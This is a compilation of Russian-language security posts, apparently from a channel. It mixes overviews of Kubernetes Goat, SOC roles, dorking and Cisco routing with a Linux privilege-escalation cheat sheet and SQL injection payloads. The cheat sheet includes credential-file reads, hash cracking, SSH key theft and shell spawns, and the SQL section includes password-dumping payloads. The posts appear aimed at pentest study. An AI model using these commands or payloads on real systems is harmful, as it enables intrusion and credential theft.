Kubernetes Goat v2 🐐
Достаточно интересный проект, если вы хотели бы протестировать K8S

▶️Источник

Недавно вышел новый релиз проекта Kubernetes Goat – заведомо уязвимого кластера, на котором можно изучать аспекты ИБ K8S не только теоретически, но и практически.

Помимо этого, был подготовлен новый web site, на котором можно получить детальную информацию о проекте и лабораторных работах.

На текущий момент есть 20 (19,5, т.к. Tiller уже редко где используется, если используется вообще) лабораторных работ. Например:
🍭 Falco - Runtime security monitoring & detection
🍭 Secure network boundaries using Network Security Policies
🍭 RBAC least privileges misconfiguration
🍭 DIND (docker-in-docker) exploitation
🍭 Container escape to the host system и многое другое!

У каждой лабораторной есть исчерпывающее описание и детальные инструкции о том, как ее реализовать. Впрочем, если не «хотите подсматривать» - можно пройти все лабораторные самостоятельно.

И, как обычно, много общей полезной информации на тему контейнеров и оркестрации – от cheatsheet до ссылок на разные интересные ресурсы.

#SOC

Что такое SOC?🧐

SOC - предоставляют широкий спектр услуг, начиная с мониторинга и управления и заканчивая комплексными решениями угроз и размещенной безопасностью, которые можно настроить в соответствии с потребностями заказчиков.
Основные элементы SOC:
◾️Процесс
◾️Люди
◾️Технология
Классификация людей в SOC:
🔸Аналитики предупреждения уровня 1 - эти специалисты отслеживают входящие оповещения, проверяют, действительно ли произошел инцидент, и при необходимости перенаправляют обращения на уровень 2 (мониторинг, открытие заявок, базовые меры по устранению угроз)

🔸Специалисты уровня 2 - ответственные за реагирование на инциденты - эти специалисты должны проводить доскональное расследование инцидентов и давать рекомендации по их устранению или действиям, которые необходимо предпринять (углубленное расследование; советы по восстановлению)

🔸Охотники уровня 3 - обладают знаниями экспертного уровня в области сетей, конечных точек, аналитики угроз и обратной разработки вредоносного ПО. Они являются экспертами в отслеживании работы вредоносного ПО, чтобы определить его влияние и способы его удаления. Они также активно участвуют в поиске потенциальных угроз и внедрении инструментов обнаружения угроз. (углубленные знания; охота на угрозы; профилактические меры)

#web

Google Dorking📄

Google hacking / Dorking использует расширенные возможности поисковой системы Google, которые позволяют вам выбирать пользовательский контент. Например, вы можете выбрать результаты с определенного доменного имени с помощью фильтра site:, а затем сопоставить их с определенными поисковыми терминами, например, со словом admin (site:google.com admin), что вернет результаты только с сайта google.com, содержащего слово admin. Вы также можете комбинировать несколько фильтров. Вот пример нескольких фильтров, которые вы можете использовать:

🔸site:google.com - возвращает результаты только с указанного адреса сайта
🔸inurl:admin - возвращает результаты, в URL которых есть указанное слово
🔸filetype:pdf - возвращает результаты, соответствующие определенному расширению файла
🔸innoscript:admin - возвращает результаты, содержащие указанное слово в заголовке

cwtch.im — еще один безопасный мессенджер, работающий через Tor.

— Децентрализован, открытый исходный код, собственный протокол cwtch;
— Сквозное шифрование сообщений;
— Трафик через сеть Tor;
— Почти полное отсутствие метаданных (meta-data resistant)

Настройка маршрутизации на оборудования Cisco 🗞
🔸Настройка статической маршрутизации:
ip route 172.16.0.0 255.255.255.128 Serial0/0/0 - это команда для ввода статического маршрута
Вкратце: ip route - это команда, говорящая роутеру, что сейчас будет введен статический маршрут; 172.16.0.0 - это удаленная и неизвестная роутеру сеть; 255.255.255.128 - это маска удаленной сети; serial0/0/0 - это на какой шлюз мы хотим переслать пакеты, т.е адрес/интерфейс другого роутера
🔸Настройка RIP:
router rip - этой командой мы включаем протокол RIP на маршрутизаторе, и оказываемся в режиме конфигурации протокола
version 2 - включаем RIP Version 2
no auto-summary - отключаем автоматическое суммирование маршрутов
network <IP> - вводим сети, которые будут передаваться другим роутерам
🔸Настройка OSPF:
router ospf <NUM> - назначаем процесс ospf
router-id <ID> - прописываем id (1.1.1.1 к примеру)
network <IP> <WILCD_CARD_MASK> area 0 – назначаем подключенные сети к роутеру
passive-interface <INTERFACE> - отключаем интерфейсы

#linux

Linux Privilege Escalation Cheat Sheet 🗞

🔸Stored Password:
OpenVPN:
1. Попробуйте написать: cat /home/user/myvpn.ovpn
2. Из вывода команды запомните путь: “auth-user-pass”.
3.Следующая команда примерно будет такой: cat /etc/openvpn/auth.txt
History:
1. Попробуйте: cat ~/.bash_history | grep -i passw
🔸Weak File Permission:
1. cat /etc/passwd
2. unshadow <PASSWORD-FILE> <SHADOW-FILE> > unshadowed.txt
3. hashcat -m 1800 unshadowed.txt rockyou.txt -O
🔸SSH-Keys:
1. find / -name authorized_keys 2> /dev/null
2. find / -name id_rsa 2> /dev/null
3. Скопируйте содержимое id_rsa на атакующую машину
4. chmod 400 id_rsa
5. ssh -i id_rsa root@<ip>
🔸Shell-Escalating:
1. Попробуйте выполнить следующее: sudo find /bin -name nano -exec /bin/sh \;
sudo awk 'BEGIN {system("/bin/sh")}'
echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --noscript=shell.nse
sudo vim -c '!sh'
🔸Abusing Intended Functionality:
На примере Apach2:
sudo apache2 -f /etc/shadow
Уже из основной машины: '[Pasted Root Hash]' > hash.txt И john --wordlist=/usr/share/wordlists/nmap.lst hash.txt
🔸SUID Environment Variables:
1. find / -type f -perm -04000 -ls 2>/dev/null
2. strings /usr/local/bin/suid-env
🔸Capability:
1. getcap -r / 2>/dev/null
2. Запомните значение: “cap_setuid”
3. /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'

#sql

Основные моменты по SQL-инъекциям 💉

🔸In-Band SQL Injection
In-Band SQL Injection - самый простой тип для обнаружения и эксплуатации; In-Band означает, что для эксплуатации уязвимости используется один и тот же метод связи, а также получение результатов, например, обнаружение уязвимости SQL Injection на странице веб-сайта, а затем возможность извлечь данные из базы данных на той же странице.
🔸Error-Based -SQL
Этот тип SQL-инъекции наиболее полезен для легкого получения информации о структуре базы данных, поскольку сообщения об ошибках из базы данных выводятся прямо на экран браузера. Часто его можно использовать для перечисления всей базы данных.
Union-Based SQL Injection
Этот тип инъекции использует оператор SQL UNION вместе с оператором SELECT для возврата дополнительных результатов на страницу. Этот метод является наиболее распространенным способом извлечения больших объемов данных через уязвимость SQL Injection.
0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM staff_users
🔸Blind-SQLi
В отличие от In-Band SQL injection, когда мы можем видеть результаты нашей атаки прямо на экране, blind SQLi - это когда мы практически не получаем обратной связи, чтобы подтвердить, были ли наши введенные запросы успешными или нет, это происходит потому, что сообщения об ошибках отключены, но инъекция все равно работает. Вас может удивить, что для успешного перебора целой базы данных нам нужен лишь небольшой отклик.
🔸Boolean-Based
SQL-инъекция на основе булевых функций относится к ответу, который мы получаем в ответ на наши попытки инъекции и который может быть истинным/ложным, да/нет, вкл/выкл, 1/0 или любым другим ответом, который может иметь только два исхода. Этот результат подтверждает, что наша полезная нагрузка SQL Injection была либо успешной, либо нет. На первый взгляд, вам может показаться, что такой ограниченный ответ не может дать много информации. Но на самом деле, используя только эти два ответа, можно перечислить структуру и содержимое целой базы данных.
admin123' UNION SELECT 1,2,3 from users where username='admin' and password like 'a%
🔸Time-Based SQLi
Слепая SQL-инъекция, основанная на времени, очень похожа на вышеописанную булеву инъекцию, поскольку отправляются те же самые запросы, но нет визуального индикатора того, что ваши запросы на этот раз неправильные или правильные. Вместо этого индикатором правильности запроса служит время, которое требуется для его выполнения. Эта временная задержка вводится за счет использования встроенных методов, таких как SLEEP(x), наряду с оператором UNION. Метод SLEEP() будет выполняться только после успешного выполнения оператора UNION SELECT.
Так, например, при попытке определить количество столбцов в таблице можно использовать следующий запрос:
admin123' UNION SELECT SLEEP(5);--.
Методы идентификации SQL-injection:
▫️Самый очевидный метод - ввести в поля одинарную кавычку ' и проверить ошибки.
▫️Вводите булевы условия типа "ИЛИ 1=1", "ИЛИ 4=9" и т.д. и выявляйте аномалии в ответах.
▫️Фаззинг с полезными нагрузками SQL и наблюдение за ошибками
▫️Фаззинг с различными полезными нагрузками, основанными на времени, и проверка задержек в ответах
▫️SqlMap
▫️Acunetix, BurpSuite, OWASP ZAP, Wapiti

Немного про UAC и его методы обхода 📄

#windows

Контроль учетных записей пользователей (UAC) - это функция безопасности
Windows, которая заставляет любой новый процесс по умолчанию запускаться в
контексте безопасности непривилегированной учетной записи. Эта политика
применяется к процессам, запущенным любым пользователем, включая самих
администраторов. Идея заключается в том, что мы не можем полагаться только на
личность пользователя, чтобы определить, должны ли некоторые действия быть
разрешены.

https://telegra.ph/Bypass-UAC-07-18

#ssti

SSTI Payload Generator ⚒

Данный инструмент генерирует полезную нагрузку для эксплуатации SSTI-Java.
Применял много раз для решение машин на HTB.
Сам инструмент:
https://github.com/VikasVarshney/ssti-payload

#k8s

Про безопасность в Kubernetes📄

Среди причин, по которым Kubernetes получил столь широкое распространение - гибкость и отсутствие фрагментации. Возможно, Kubernetes не совершенен, но нельзя отрицать, что многим он нравится. Действительно, Kubernetes обеспечивает оркестровку для более чем трех четвертей контейнеризированных приложений сегодня. Но также не стоит забывать, что Kubernetes имеет свои проблемы с точки зрения безопасности, сегодня я предлагаю рассмотреть часть из них

https://telegra.ph/Pro-bezopasnost-v-K8S-08-05

#privileges

Kernel privilege escalation vulnerability collection⚒

Коллекция уязвимостей для повышения привилегий ядра на UNIX/Windows системах, со средой компиляции, деталями уязвимости, исполняемым файлом и т.п

https://github.com/Ascotbe/Kernelhub

#exploit

0-day RCE vulnerability on Microsoft Exchange Server✉️

Кратко: была найдена новая уязвимость в Microsoft Exchange Server
Как ее задетектить у себя на сервере?
🔸Get-ChildItem -Recurse -Path <Path_IIS_Logs> -Filter "*.log" | Select-String -Pattern 'powershell.*autodiscover\.json.*\@.*200

Сканер по данной уязвимости:
🔸https://github.com/VNCERT-CC/0dayex-checker

Все подробности можно посмотреть здесь:
🔸https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html

#ЦиклСтатей_Сети

В этой статье мы разберем основные сетевые протоколы и на каких портах они работают по умолчанию.
Стандартные порты-протоколы.

При изучении соблюдайте порядок ❤️

#cve

CVE-2022-40684

В продуктах Fortinet (FortiOS, FortiProxy и FortiSwitchManager) была найдена уязвимость, позволяющая обойти аутентификацию и конфигурацию LDAP, путем извлечения пользователей с привилегиями администратора

Все нужные ресурсы:
🔸https://github.com/carlosevieira/CVE-2022-40684
🔸https://www.usergate.com/ru/security-reports/CVE-2022-40684

#cve202233679

Что такое Kerberos и что за CVE-2022-33679?

Решил разобраться с Kerberos, а тут еще новая вулна появилась с ней.
Данная вулна позволяет аутентифицироваться как другой пользователь, НО если пользователь был настроен на отключение стандартных требований предварительной аутентификации.

Читать тут...

Если кого-то интересует только CVE, то все полезные ресурсы вы найдете здесь:

🔘https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html
🔘https://github.com/Bdenneu/CVE-2022-33679

#windows

Полезные тулзы во время пентеста Active Directory

Список самый простой, но интересный:

🔘 Impacket - набор для работы с сетевыми протоколами в инфраструктуре AD
🔘 Bloodhound - сбор информации об инфраструктуре AD
🔘 PowerSploit - модифицирует и подготавливает скрипты для выполнения кода на машине жертвы.
🔘 Neo4j - помогает структурировать данные
🔘 Mimikatz - позволяет просматривать и сохранять учетные данные
🔘 Evil-WinRM - WinRM Shell
🔘 Kerbrute - можно сделать User Enumeration
🔘 Responder - можно сделать SMB-Relay

Рановато, но таки да
ТОП 10 из 2022

1. Follina (CVE-2022-30190)
2. Log4Shell (CVE-2021-44228)
3. Spring4Shell (CVE-2022-22965)
4. F5 BIG-IP (CVE-2022-1388)
5. Google Chrome zero-day (CVE-2022-0609)
6. Old but not forgotten - Microsoft Office bug (CVE-2017-11882)
7. ProxyNotShell (CVE-2022-41082, CVE-2022-41040)
8. Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352)
9. Atlassian Confluence RCE flaw (CVE-2022-26134)
10. Zyxel RCE vulnerability (CVE-2022-30525)

Смотрим Flipper Zero и немного модифицируем

Думал еще потыкать API-ху, но разрабы все ещё ее пилят. Поэтому ждем релиза документации

https://telegra.ph/Smotrim-i-nemnogo-modificiruem-Flipper-Zero-12-07

Kubernetes + Wireshark = KubeShark

По факту, эта тулза позволяет просматривать трафик вашего кластера на K8S.
Если хотите посмотреть данную тулзу, то:

Проверяем, что есть доступ к DockerHub

Совершаем установку:
sh <(curl -Ls https://kubeshark.co/install)

Запускаем:
kubeshark tap

Выбираем нужный POD и играемся:
kubeshark tap catalogue-b87b45784-sxc8q

Также можно выбрать определенный namespace:
kubeshark tap -n sock-shop

А можно все сразу:
kubeshark tap -A

Всю документацию можно найти здесь